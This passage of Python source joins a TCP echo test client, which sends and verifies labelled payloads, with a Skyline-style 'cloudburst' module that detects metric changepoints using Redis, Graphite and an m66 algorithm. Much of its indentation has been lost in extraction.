Given some raw bytes, return a display string
Only show the beginning and end of largish (2xMAGIC_SIZE) arrays.
:param raw_bytes:
:return: display string
"""
    MAGIC_SIZE = 50  # Content repeats after chunks this big - used by echo server, too
if len(raw_bytes) > 2 * MAGIC_SIZE:
result = repr(raw_bytes[:MAGIC_SIZE]) + " ... " + repr(raw_bytes[-MAGIC_SIZE:])
else:
result = repr(raw_bytes)
return result
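# Illustrative note (not part of the original source): for a 300-byte
# payload, split_chunk_for_display(b"x" * 300) returns the repr() of the
# first 50 bytes, a literal " ... ", then the repr() of the last 50 bytes;
# anything up to 100 bytes is simply repr()'d in full.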
class TcpEchoClient:
def __init__(self, prefix, host, port, size, count, timeout, logger):
"""
        Send one payload of size bytes, receive it echoed back, and repeat
        count times (currently the only strategy; TODO: more strategies).
        :param prefix: text prepended to every log line written by this client
        :param host: connect to this host
        :param port: connect to this port
        :param size: size of individual payload chunks in bytes
        :param count: number of payload chunks
        :param timeout: give up after this many seconds; 0.0 disables the timeout
        :param logger: Logger() object
        :return:
"""
# Start up
self.sock = None
self.prefix = prefix
self.host = host
self.port = int(port)
self.size = size
self.count = count
self.timeout = timeout
self.logger = logger
self.keep_running = True
self.is_running = False
self.exit_status = None
self.error = None
self._thread = Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
self.logger.log("%s Client is starting up" % self.prefix)
try:
start_time = time.time()
self.is_running = True
self.logger.log('%s Connecting to host:%s, port:%d, size:%d, count:%d' %
(self.prefix, self.host, self.port, self.size, self.count))
total_sent = 0
total_rcvd = 0
if self.count > 0 and self.size > 0:
# outbound payload only if count and size both greater than zero
payload_out = []
out_list_idx = 0 # current _out array being sent
out_byte_idx = 0 # next-to-send in current array
out_ready_to_send = True
# Generate unique content for each message so you can tell where the message
# or fragment belongs in the whole stream. Chunks look like:
# b'[localhost:33333:6:0]ggggggggggggggggggggggggggggg'
# host: localhost
# port: 33333
# index: 6
# offset into message: 0
CONTENT_CHUNK_SIZE = 50 # Content repeats after chunks this big - used by echo server, too
for idx in range(self.count):
body_msg = ""
padchar = "abcdefghijklmnopqrstuvwxyz@#$%"[idx % 30]
while len(body_msg) < self.size:
chunk = "[%s:%d:%d:%d]" % (self.host, self.port, idx, len(body_msg))
padlen = CONTENT_CHUNK_SIZE - len(chunk)
chunk += padchar * padlen
body_msg += chunk
if len(body_msg) > self.size:
body_msg = body_msg[:self.size]
payload_out.append(bytearray(body_msg.encode()))
# incoming payloads
payload_in = []
in_list_idx = 0 # current _in array being received
for i in range(self.count):
payload_in.append(bytearray())
else:
# when count or size .LE. zero then just connect-disconnect
self.keep_running = False
# Set up connection. If the TCPConnectors have not yet finished
# coming up then it is possible to get a ConnectionRefusedError.
            # This is not necessarily an error, so retry
host_address = (self.host, self.port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_timeout = time.time() + TIMEOUT
while True:
try:
self.sock.connect(host_address)
break
except ConnectionRefusedError as err:
if time.time() > conn_timeout:
self.logger.log('%s Failed to connect to host:%s port:%d - Connection Refused!'
% (self.prefix, self.host, self.port))
raise
time.sleep(0.1)
self.logger.log('%s Failed to connect to host:%s port:%d - Retrying...'
% (self.prefix, self.host, self.port))
self.sock.setblocking(False)
# set up selector
sel = selectors.DefaultSelector()
sel.register(self.sock,
selectors.EVENT_READ | selectors.EVENT_WRITE)
# event loop
while self.keep_running:
if self.timeout > 0.0:
elapsed = time.time() - start_time
if elapsed > self.timeout:
self.exit_status = "%s Exiting due to timeout. Total sent= %d, total rcvd= %d" % \
(self.prefix, total_sent, total_rcvd)
break
for key, mask in sel.select(timeout=0.1):
sock = key.fileobj
if mask & selectors.EVENT_READ:
recv_data = sock.recv(1024)
if recv_data:
                            total_rcvd += len(recv_data)
payload_in[in_list_idx].extend(recv_data)
if len(payload_in[in_list_idx]) == self.size:
self.logger.log("%s Rcvd message %d" % (self.prefix, in_list_idx))
in_list_idx += 1
if in_list_idx == self.count:
# Received all bytes of all chunks - done.
self.keep_running = False
# Verify the received data
if payload_in != payload_out:
for idxc in range(self.count):
if not payload_in[idxc] == payload_out[idxc]:
for idxs in range(self.size):
ob = payload_out[idxc][idxs]
ib = payload_in[idxc][idxs]
if ob != ib:
self.error = "%s ERROR Rcvd message verify fail. row:%d, col:%d, " \
"expected:%s, actual:%s" \
% (self.prefix, idxc, idxs, repr(ob), repr(ib))
break
else:
out_ready_to_send = True
sel.modify(sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
elif len(payload_in[in_list_idx]) > self.size:
self.error = "ERROR Received message too big. Expected:%d, actual:%d" % \
(self.size, len(payload_in[in_list_idx]))
break
else:
pass # still accumulating a message
else:
# socket closed
self.keep_running = False
if not in_list_idx == self.count:
self.error = "ERROR server closed. Echoed %d of %d messages." % (in_list_idx, self.count)
if self.keep_running and mask & selectors.EVENT_WRITE:
if out_ready_to_send:
n_sent = self.sock.send(payload_out[out_list_idx][out_byte_idx:])
total_sent += n_sent
out_byte_idx += n_sent
if out_byte_idx == self.size:
self.logger.log("%s Sent message %d" % (self.prefix, out_list_idx))
out_byte_idx = 0
out_list_idx += 1
sel.modify(self.sock, selectors.EVENT_READ) # turn off write events
out_ready_to_send = False # turn on when rcvr receives
else:
pass # logger.log("DEBUG: ignoring EVENT_WRITE")
# shut down
sel.unregister(self.sock)
self.sock.close()
except Exception:
self.error = "ERROR: exception : '%s'" % traceback.format_exc()
self.sock.close()
self.is_running = False
def wait(self, timeout=TIMEOUT):
self.logger.log("%s Client is shutting down" % self.prefix)
self.keep_running = False
self._thread.join(timeout)
def main(argv):
retval = 0
# parse args
p = argparse.ArgumentParser()
p.add_argument('--host', '-b',
help='Required target host')
p.add_argument('--port', '-p', type=int,
help='Required target port number')
p.add_argument('--size', '-s', type=int, default=100, const=1, nargs='?',
help='Size of payload in bytes must be >= 0. Size of zero connects and disconnects with no data traffic.')
p.add_argument('--count', '-c', type=int, default=1, const=1, nargs='?',
help='Number of payloads to process must be >= 0. Count of zero connects and disconnects with no data traffic.')
p.add_argument('--name',
help='Optional logger prefix')
p.add_argument('--timeout', '-t', type=float, default=0.0, const=1, nargs="?",
help='Timeout in seconds. Default value "0" disables timeouts')
p.add_argument('--log', '-l',
action='store_true',
help='Write activity log to console')
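    # Illustrative usage (not part of the original source), assuming an echo
    # server is already listening on the target port:
    #   python TCP_echo_client.py --host localhost --port 33333 \
    #       --size 100 --count 10 --timeout 60 --log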
del argv[0]
args = p.parse_args(argv)
# host
if args.host is None:
raise Exception("User must specify a host")
host = args.host
# port
if args.port is None:
raise Exception("User must specify a port number")
port = args.port
# size
if args.size < 0:
raise Exception("Size must be greater than or equal to zero")
size = args.size
# count
if args.count < 0:
raise Exception("Count must be greater than or equal to zero")
count = args.count
# name / prefix
prefix = args.name if args.name is not None else "ECHO_CLIENT (%d_%d_%d)" % \
(port, size, count)
# timeout
if args.timeout < 0.0:
raise Exception("Timeout must be greater than or equal to zero")
signaller = GracefulExitSignaler()
logger = None
try:
# logging
logger = Logger(title="%s host:%s port %d size:%d count:%d" % (prefix, host, port, size, count),
print_to_console=args.log,
save_for_dump=False)
client = TcpEchoClient(prefix, host, port, size, count, args.timeout, logger)
keep_running = True
while keep_running:
time.sleep(0.1)
if client.error is not None:
logger.log("%s Client stopped with error: %s" % (prefix, client.error))
keep_running = False
retval = 1
if client.exit_status is not None:
logger.log("%s Client stopped with status: %s" % (prefix, client.exit_status))
keep_running = False
if signaller.kill_now:
logger.log("%s Process killed with signal" % prefix)
keep_running = False
if keep_running and not client.is_running:
logger.log("%s Client stopped with no error or status" % prefix)
keep_running = False
except Exception:
client.error = "ERROR: exception : '%s'" % traceback.format_exc()
if logger is not None:
logger.log("%s Exception: %s" % (prefix, traceback.format_exc()))
retval = 1
if client.error is not None:
# write client errors to stderr
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
elines = client.error.split("\n")
for line in elines:
eprint("ERROR:", prefix, line)
return retval
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
cloudburst.py
|
import logging
from time import time, sleep
from threading import Thread
from multiprocessing import Process
import os
import sys
from os import kill, getpid
import traceback
from timeit import default_timer as timer
from math import ceil
from ast import literal_eval
from msgpack import Unpacker
from sqlalchemy.sql import select
import settings
from skyline_functions import (
get_redis_conn, get_redis_conn_decoded, nonNegativeDerivative)
from functions.redis.get_metric_timeseries import get_metric_timeseries
from functions.graphite.get_metrics_timeseries import get_metrics_timeseries
from custom_algorithms import run_custom_algorithm_on_timeseries
from database import (
get_engine, cloudburst_table_meta, ionosphere_matched_table_meta,
ionosphere_layers_matched_table_meta, ionosphere_table_meta,
anomalies_table_meta)
from functions.database.queries.metric_id_from_base_name import metric_id_from_base_name
skyline_app = 'luminosity'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
full_uniques = '%sunique_metrics' % settings.FULL_NAMESPACE
LOCAL_DEBUG = False
current_path = os.path.dirname(__file__)
root_path = os.path.dirname(current_path)
LUMINOSITY_CLOUDBURST_OPTS = {
'default': {
'window': 4,
'nth_median': 6,
'n_sigma': 6,
}
}
try:
LUMINOSITY_CLOUDBURST_PROCESSES = settings.LUMINOSITY_CLOUDBURST_PROCESSES
except KeyError:
LUMINOSITY_CLOUDBURST_PROCESSES = 2
except:
LUMINOSITY_CLOUDBURST_PROCESSES = 2
try:
run_every = settings.LUMINOSITY_CLOUDBURST_RUN_EVERY
except KeyError:
run_every = 900
except:
run_every = 900
# @added 20210730 - Feature #4164: luminosity - cloudbursts
class Cloudburst(Thread):
"""
    The Cloudburst class, which controls the luminosity/cloudburst thread and
spawned processes. luminosity/cloudburst analyses metrics to identify
significant changepoints using the m66 algorithm.
"""
def __init__(self, parent_pid):
"""
Initialize Cloudburst
"""
super(Cloudburst, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
sys.exit(0)
def find_cloudbursts(self, i, unique_metrics):
"""
Create and manage the required lists and Redis sets
"""
process_number = i
spin_start = time()
logger.info('cloudburst :: find_cloudbursts :: process %s started' % str(i))
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
log_msg = 'cloudburst :: find_cloudbursts :: failed to get MySQL engine - %s' % e
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get MySQL engine - %s' % e)
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: calling engine.dispose() - %s' % e)
last_run_timestamp = 0
luminosity_cloudburst_last_timestamp_key = 'luminosity.cloudburst.last_run_timestamp.process.%s' % str(i)
try:
last_run_timestamp = self.redis_conn_decoded.get(luminosity_cloudburst_last_timestamp_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get timestamp from %s Redis key - %s' % (
luminosity_cloudburst_last_timestamp_key, e))
last_run_timestamp = 0
if last_run_timestamp:
logger.info('cloudburst :: find_cloudbursts :: %s Redis key has not expired, not running' % (
luminosity_cloudburst_last_timestamp_key))
return
# Set Redis key
try:
self.redis_conn_decoded.setex(luminosity_cloudburst_last_timestamp_key, 60, str(int(spin_start)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed set timestamp for %s Redis key - %s' % (
luminosity_cloudburst_last_timestamp_key, e))
if len(unique_metrics) == 0:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine unique_metrics from %s Redis key' % (
full_uniques))
return
# Discover assigned metrics
keys_per_processor = int(ceil(float(len(unique_metrics)) / float(LUMINOSITY_CLOUDBURST_PROCESSES)))
if i == LUMINOSITY_CLOUDBURST_PROCESSES:
assigned_max = len(unique_metrics)
else:
assigned_max = min(len(unique_metrics), i * keys_per_processor)
assigned_min = (i - 1) * keys_per_processor
assigned_keys = range(assigned_min, assigned_max)
# Compile assigned metrics
assigned_metrics = [unique_metrics[index] for index in assigned_keys]
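        # Illustrative note (not part of the original source): with, say,
        # 1000 unique_metrics and LUMINOSITY_CLOUDBURST_PROCESSES = 2,
        # keys_per_processor is ceil(1000 / 2) = 500, so process 1 is
        # assigned indices 0-499 and process 2 (i == the process count)
        # takes the remainder, indices 500-999.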
use_mget = True
# assigned_metrics = unique_metrics[500:503]
# use_mget = False
# align = True
truncate_last_datapoint = True
window = 10
nth_median = 6
n_sigma = 6
# long_period_high_res = True
long_period_high_res = False
custom_algorithm = 'm66'
algorithm_source = '%s/custom_algorithms/%s.py' % (root_path, custom_algorithm)
m66_candidate_metrics = {}
now_timestamp = int(time())
key_reference_timestamp = (int(now_timestamp) // run_every * run_every)
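        # Illustrative note (not part of the original source): the floor
        # division above aligns the key to the current run window, e.g. with
        # run_every = 900 and now_timestamp = 1627728123 the value is
        # 1627728123 // 900 * 900 = 1627727400, so every process in the same
        # 15-minute run writes to the same Redis keys below.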
processed_metrics_key = 'luminosity.cloudburst.processed_metrics.%s' % str(key_reference_timestamp)
cloudburst_info_key = 'luminosity.cloudburst.info.%s' % str(key_reference_timestamp)
        # This key is NOT managed in metrics manager; it is managed below
cloudburst_anomalies_processed_key = 'luminosity.cloudburst.anomalies_processed'
# check_last = 3600
# check_last = 5400
check_last = (3600 * 4)
# check_last = 86400
long_period_check_last = (3600 * 6)
# long_period_check_last = 86400
if long_period_high_res:
long_period_check_last = (3600 * 4)
logger.info('cloudburst :: find_cloudbursts :: checking %s metrics with %s' % (
str(len(assigned_metrics)), custom_algorithm))
redis_hash_key = 'analyzer.metrics_manager.resolutions'
resolutions_dict = {}
try:
resolutions_dict = self.redis_conn_decoded.hgetall(redis_hash_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to query Redis hash key %s - %s' % (
redis_hash_key, e))
return
# Manage the luminosity.cloudburst.anomalies_processed delete entries
# older than a week. This Redis hash contains both short_period and
# long_period identified AND processed metric timestamps to increase
# efficiency in pushing short_period cloudbursts to second stage
# analysis.
cloudburst_anomalies_processed = {}
try:
cloudburst_anomalies_processed = self.redis_conn_decoded.hgetall(cloudburst_anomalies_processed_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to query Redis hash key %s - %s' % (
cloudburst_anomalies_processed_key, e))
for key in list(cloudburst_anomalies_processed.keys()):
key_ts = None
try:
key_ts = int(str(key.split('.')[-1]))
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: fail to determine key_ts from key %s - %s' % (
str(key), e))
if isinstance(key_ts, int):
# if key_ts < (now_timestamp - (86400 * 7)):
if key_ts < (now_timestamp - long_period_check_last):
try:
self.redis_conn_decoded.hdel(cloudburst_anomalies_processed_key, key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to delete %s from Redis hash key %s - %s' % (
str(key), cloudburst_anomalies_processed_key, e))
raw_assigned = None
derivative_metrics = []
if use_mget:
try:
raw_assigned = self.redis_conn.mget(assigned_metrics)
logger.info('cloudburst :: find_cloudbursts :: got raw_assigned metric data from Redis for %s metrics' % str(len(assigned_metrics)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get raw_assigned from Redis - %s' % e)
try:
# @modified 20211012 - Feature #4280: aet.metrics_manager.derivative_metrics Redis hash
# derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
derivative_metrics = list(self.redis_conn_decoded.smembers('aet.metrics_manager.derivative_metrics'))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get derivative_metrics from Redis - %s' % e)
derivative_metrics = []
try:
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get non_derivative_monotonic_metrics from Redis - %s' % e)
non_derivative_monotonic_metrics = []
timer_start = timer()
processed = 0
no_data = 0
too_short = 0
too_old = 0
not_analysed = 0
analysed = 0
for item_index, metric in enumerate(assigned_metrics):
if processed:
if (processed % 100) == 0:
logger.info('cloudburst :: find_cloudbursts :: processed %s of %s metrics with %s algorithm, %s significant changepoint candidates at %s hours found so far' % (
str(processed), str(len(assigned_metrics)), custom_algorithm,
str(len(m66_candidate_metrics)), str(int(check_last / 3600))))
metric_name = metric
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
metric_name = '%s%s' % (settings.FULL_NAMESPACE, base_name)
try:
self.redis_conn.sadd(processed_metrics_key, metric_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s to %s Redis set - %s' % (
metric_name, processed_metrics_key, e))
timeseries = []
if raw_assigned:
try:
raw_series = raw_assigned[item_index]
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to unpack %s timeseries - %s' % (
metric_name, e))
timeseries = []
if timeseries:
calculate_derivative = False
if metric_name in derivative_metrics:
calculate_derivative = True
if metric_name in non_derivative_monotonic_metrics:
calculate_derivative = False
if calculate_derivative:
try:
derivative_timeseries = nonNegativeDerivative(timeseries)
timeseries = derivative_timeseries
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: nonNegativeDerivative failed on %s - %s' % (
metric_name, e))
continue
if not timeseries:
try:
timeseries = get_metric_timeseries(skyline_app, base_name, False)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: get_metric_timeseries failed for %s - %s' % (
base_name, e))
timeseries = []
if not timeseries:
no_data += 1
continue
if len(timeseries) < 3:
too_short += 1
continue
timeseries_last_timestamp = int(timeseries[-1][0])
if timeseries_last_timestamp < (now_timestamp - (run_every * 2)):
too_old += 1
continue
if truncate_last_datapoint:
timeseries_length = len(timeseries)
timeseries = timeseries[1:(timeseries_length - 2)]
resolution = 0
try:
resolution = int(resolutions_dict[base_name])
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed get resolution for %s from resolutions_dict - %s' % (
base_name, e))
continue
# first_timestamp = now_timestamp - (3600 * 4)
# timeseries = [item for item in timeseries if int(item[0]) >= first_timestamp]
aligned_timeseries = []
for ts, value in timeseries:
aligned_timeseries.append([int(int(ts) // resolution * resolution), value])
timeseries = aligned_timeseries
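            # Illustrative note (not part of the original source): the
            # alignment above floors each timestamp to its resolution
            # boundary, e.g. with resolution = 60 a timestamp of 1630000037
            # becomes 1630000037 // 60 * 60 = 1630000020, so datapoints from
            # different metrics land on the same period boundaries.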
custom_check_last = check_last
window = 5
if resolution > 60:
custom_check_last = check_last + 1800
window = 4
if resolution > 600:
custom_check_last = check_last + 3600
window = 3
nth_median = 6
n_sigma = 6
use_debug_logging = False
debug_algorithms = False
custom_algorithm_dict = {
'base_name': base_name,
'algorithm_source': algorithm_source,
'algorithm_parameters': {
'nth_median': nth_median, 'sigma': n_sigma, 'window': window,
'minimum_sparsity': 75, 'resolution': resolution,
'determine_duration': True, 'return_anomalies': True,
'save_plots_to': False, 'save_plots_to_absolute_dir': False,
'filename_prefix': False, 'debug_logging': use_debug_logging,
'shift_to_start_of_window': False,
},
'max_execution_time': 0.5,
'consensus': 1,
'algorithms_allowed_in_consensus': [custom_algorithm],
'run_3sigma_algorithms': False,
'run_before_3sigma': False,
'run_only_if_consensus': False,
'use_with': [skyline_app],
'debug_logging': False
}
result = None
anomalyScore = None
anomalies = []
try:
result, anomalyScore, anomalies = run_custom_algorithm_on_timeseries(skyline_app, self.current_pid, base_name, timeseries, custom_algorithm, custom_algorithm_dict, debug_algorithms)
if result and debug_algorithms:
logger.info('cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to run custom_algorithm %s on %s - %s' % (
custom_algorithm, base_name, e))
continue
if result is None:
not_analysed += 1
else:
analysed += 1
processed += 1
new_anomalies = []
if anomalies:
anomaly_timestamps = [int(item[0]) for item in anomalies]
anomalies_present_in_period = [ts for ts in anomaly_timestamps if int(ts) > (now_timestamp - custom_check_last)]
if len(anomalies_present_in_period) == 0:
continue
for item in anomalies:
if int(item[0]) not in anomalies_present_in_period:
continue
already_added = None
processed_anomaly_key = '%s.%s' % (base_name, str(int(item[0])))
try:
already_added = self.redis_conn_decoded.hget(cloudburst_anomalies_processed_key, processed_anomaly_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed at determine already_added from %s - %s' % (
processed_anomaly_key, e))
if not already_added:
new_anomalies.append(item)
if new_anomalies:
m66_candidate_metrics[base_name] = {}
m66_candidate_metrics[base_name][custom_algorithm] = {}
m66_candidate_metrics[base_name][custom_algorithm]['anomalies'] = new_anomalies
timer_end = timer()
logger.info('cloudburst :: find_cloudbursts :: found %s candidate_metrics with %s algorithm from %s processed metrics in %.6f seconds' % (
str(len(m66_candidate_metrics)), custom_algorithm,
str(processed), (timer_end - timer_start)))
info_data_dict = {
'processed': processed,
'analysed': analysed,
'not_analysed': not_analysed,
'no_data': no_data,
'too_short': too_short,
'too_old': too_old,
}
try:
self.redis_conn_decoded.hset(cloudburst_info_key, process_number, str(info_data_dict))
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s Redis hash key %s - %s' % (
str(info_data_dict), cloudburst_info_key, e))
candidate_metrics_key = 'luminosity.cloudburst.candidate_metrics.short_period.%s' % str(key_reference_timestamp)
key_created = False
for base_name in list(m66_candidate_metrics.keys()):
try:
self.redis_conn.hset(candidate_metrics_key, base_name, str(m66_candidate_metrics[base_name]))
self.redis_conn.expire(candidate_metrics_key, 3600)
key_created = True
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to create %s Redis hash key - %s' % (
candidate_metrics_key, e))
if key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
candidate_metrics_key))
# Second stage analysis, check to see if the changepoint is anomalous
# at 7 days
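# Each candidate metric from the short period analysis is re-fetched
# from Graphite at a 7 day period and re-analysed with the same custom
# algorithm to confirm the change is also anomalous at the longer period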
second_stage_m66_candidate_metrics = {}
timer_start = timer()
if len(m66_candidate_metrics) > 0:
logger.info('cloudburst :: find_cloudbursts :: checking %s candidate_metrics with %s algorithm at 7 days' % (
str(len(m66_candidate_metrics)), custom_algorithm))
from_timestamp = int(now_timestamp) - (86400 * 7)
until_timestamp = int(now_timestamp)
window = 4
summarize_intervalString = '15min'
summarize_func = 'median'
nth_median = 6
n_sigma = 6
resolution = 900
if long_period_high_res:
window = 10
nth_median = 6
n_sigma = 6
resolution = 60
truncate_last_datapoint = True
metrics_to_do = list(m66_candidate_metrics.keys())
while len(metrics_to_do) > 0:
current_base_names = []
while len(current_base_names) < 50 and len(metrics_to_do) > 0:
current_base_names.append(metrics_to_do.pop(0))
metrics_functions = {}
truncate_last_datapoint = False
for base_name in current_base_names:
metrics_functions[base_name] = {}
if long_period_high_res:
metrics_functions[base_name]['functions'] = None
else:
metrics_functions[base_name]['functions'] = {'summarize': {'intervalString': summarize_intervalString, 'func': summarize_func}}
# If the timeseries is summarized truncate the last datapoint
# so it does not fall off a cliff
truncate_last_datapoint = True
try:
metrics_timeseries = get_metrics_timeseries(skyline_app, metrics_functions, from_timestamp, until_timestamp, log=False)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: get_metrics_timeseries failed - %s' % e)
for base_name in current_base_names:
timeseries = []
try:
timeseries = metrics_timeseries[base_name]['timeseries']
except KeyError:
timeseries = []
if not timeseries:
logger.error('error :: cloudburst :: find_cloudbursts :: no timeseries from Graphite for %s' % base_name)
continue
if truncate_last_datapoint:
timeseries_length = len(timeseries)
timeseries = timeseries[1:(timeseries_length - 2)]
if long_period_high_res:
aligned_timeseries = []
for ts, value in timeseries:
aligned_timeseries.append([int(int(ts) // resolution * resolution), value])
timeseries = aligned_timeseries
some_debug = False
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: checking timeseries of length %s from Graphite for %s' % (
str(len(timeseries)), base_name))
custom_algorithm_dict = {
'base_name': base_name,
'algorithm_source': algorithm_source,
'algorithm_parameters': {
'nth_median': nth_median, 'sigma': n_sigma, 'window': window,
'minimum_sparsity': 0, 'resolution': resolution,
'determine_duration': True, 'return_anomalies': True,
'save_plots_to': False, 'save_plots_to_absolute_dir': False,
'filename_prefix': False, 'debug_logging': False,
},
'max_execution_time': 0.5,
'consensus': 1,
'algorithms_allowed_in_consensus': [custom_algorithm],
'run_3sigma_algorithms': False,
'run_before_3sigma': False,
'run_only_if_consensus': False,
'use_with': [skyline_app],
'debug_logging': False
}
debug_algorithms = False
result = None
anomalyScore = None
anomalies = []
try:
result, anomalyScore, anomalies = run_custom_algorithm_on_timeseries(skyline_app, self.current_pid, base_name, timeseries, custom_algorithm, custom_algorithm_dict, debug_algorithms)
if result and debug_algorithms:
logger.info('cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to run custom_algorithm %s on %s - %s' % (
custom_algorithm, base_name, e))
continue
new_anomalies = []
if anomalies:
anomaly_timestamps = [int(item[0]) for item in anomalies]
anomalies_present_in_period = [ts for ts in anomaly_timestamps if int(ts) > (now_timestamp - long_period_check_last)]
if len(anomalies_present_in_period) == 0:
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: %s has no cloudbursts in period' % base_name)
continue
for item in anomalies:
if int(item[0]) not in anomalies_present_in_period:
continue
already_added = None
processed_anomaly_key = '%s.%s' % (base_name, str(int(item[0])))
try:
already_added = self.redis_conn_decoded.hget(cloudburst_anomalies_processed_key, processed_anomaly_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine already_added from %s - %s' % (
processed_anomaly_key, e))
if not already_added:
new_anomalies.append(item)
else:
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: all %s cloudbursts in period for %s have already been processed' % (
str(len(anomalies)), base_name))
if new_anomalies:
logger.info('cloudburst :: find_cloudbursts :: %s found %s new anomalies in window - %s - result: %s, anomalyScore: %s, anomalies: %s' % (
custom_algorithm, str(len(new_anomalies)),
base_name, str(result), str(anomalyScore),
str(len(new_anomalies))))
second_stage_m66_candidate_metrics[base_name] = {}
second_stage_m66_candidate_metrics[base_name][custom_algorithm] = {}
second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies'] = new_anomalies
timer_end = timer()
logger.info('cloudburst :: find_cloudbursts :: found %s 2nd stage candidate_metrics with %s algorithm at 7 days from the 24 hour candidate metrics in %.6f seconds' % (
str(len(second_stage_m66_candidate_metrics)), custom_algorithm,
(timer_end - timer_start)))
candidate_metrics_key = 'luminosity.cloudburst.identified.long_period.%s' % str(key_reference_timestamp)
key_created = False
for base_name in list(second_stage_m66_candidate_metrics.keys()):
try:
self.redis_conn.hset(candidate_metrics_key, base_name, str(second_stage_m66_candidate_metrics[base_name]))
self.redis_conn.expire(candidate_metrics_key, 14400)
key_created = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to create %s Redis hash key - %s' % (
candidate_metrics_key, e))
if key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
candidate_metrics_key))
# Add to DB
if len(second_stage_m66_candidate_metrics) > 0:
logger.info('cloudburst :: find_cloudbursts :: added %s 2nd stage candidate_metrics to %s Redis hash' % (
str(len(second_stage_m66_candidate_metrics)), candidate_metrics_key))
# Define each cloudburst incident as a period with a start and an
# end. A period is defined by continuous triggering of m66; if only
# a single m66 anomaly is triggered then the period runs from
# anomaly_timestamp until (anomaly_timestamp + resolution)
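# For example (illustrative timestamps): with a 900 second resolution,
# m66 anomalies at 1628600400, 1628601300 and 1628602200 would be
# grouped into a single period with start 1628600400, end 1628602200
# and a duration of 1800 seconds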
full_duration = until_timestamp - from_timestamp
found_cloudbursts = {}
for base_name in list(second_stage_m66_candidate_metrics.keys()):
try:
found_cloudbursts[base_name] = {}
anomalies = second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
initial_start_ts = int(anomalies[0][0])
start_ts = int(anomalies[0][0])
last_ts = start_ts
for ts in [int(ts) for ts, value in anomalies]:
if ts == initial_start_ts:
last_ts = ts
continue
if ts == (last_ts + resolution):
